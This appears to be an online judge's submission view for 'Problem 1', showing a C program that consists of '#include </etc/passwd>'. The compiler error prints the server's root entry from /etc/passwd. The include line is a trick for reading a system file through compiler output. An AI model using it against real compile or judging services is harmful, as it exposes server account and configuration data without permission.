View Code of Problem 1

#include </etc/passwd>
int main()
{
    return 0;
}
/*
In file included from Main.c:1:0:
/etc/passwd:1:5: error: expected '=', ',', ';', 'asm' or '__attribute__' before ':' token
 root:x:0:0:root:/root:/bin/bash
     ^
*/

Double click to view unformatted code.


Back to problem 1